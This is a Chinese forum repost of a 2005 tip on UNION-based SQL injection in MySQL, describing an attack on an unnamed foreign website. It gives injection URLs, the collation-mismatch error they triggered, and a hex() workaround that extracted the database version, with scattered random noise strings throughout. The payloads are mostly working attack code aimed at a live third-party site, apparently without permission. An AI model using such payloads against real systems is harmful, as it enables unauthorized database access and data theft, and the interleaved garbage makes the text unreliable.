本文作者:SuperHei. I8 T$ p5 f; o! r
文章性质:原创
7 h, m# E# O) h4 H# v/ {发布日期:2005-10-18
8 |# { |' q" f6 P1 ~5 G; E. i测试个国外的站时:
2 e7 b, B/ j& N9 u* l0 H$ Qurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*9 O( J$ r( Y! h7 T
返回错误:
, q. r& D Y, Q( ?/ gIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
# p8 ]4 A9 v1 i4 P8 n1 \MySQL Error No. 1264 A0 \" {3 c, [ T4 E5 w8 Q9 L
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
. d5 ~" A" ^: o, w( D解决办法:转为其他编码如hex。 Y% L2 ?9 o; h
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
. u" o, S1 s3 o9 G9 j* {成功得到hex(version())的值为:0 p$ h/ h+ b x, M
342E312E332D62657461, H8 U" W e T. N" P
回Mysql查询下得到:
8 w- b- I6 H6 \6 x$ @3 \6 r6 `8 smysql> select 0x342E312E332D62657461;. H! W9 a) V- N, Q
+------------------------++ C( E' o7 c; |. y% Q
| 0x342E312E332D62657461 |# m% K' p6 N; f6 G
+------------------------+
+ \( j" B, u; Z; \% Z4 F5 _| 4.1.3-beta |
* O) b+ K: I8 ~: K* E. `4 \+------------------------+
& o- W) k2 `5 ] E1 row in set (0.00 sec)
4 C1 e2 @1 q- E/ d) y9 R1 r# n2 @1 p9 s
|
发表于 2012-9-15 14:04:54
收藏
支持
反对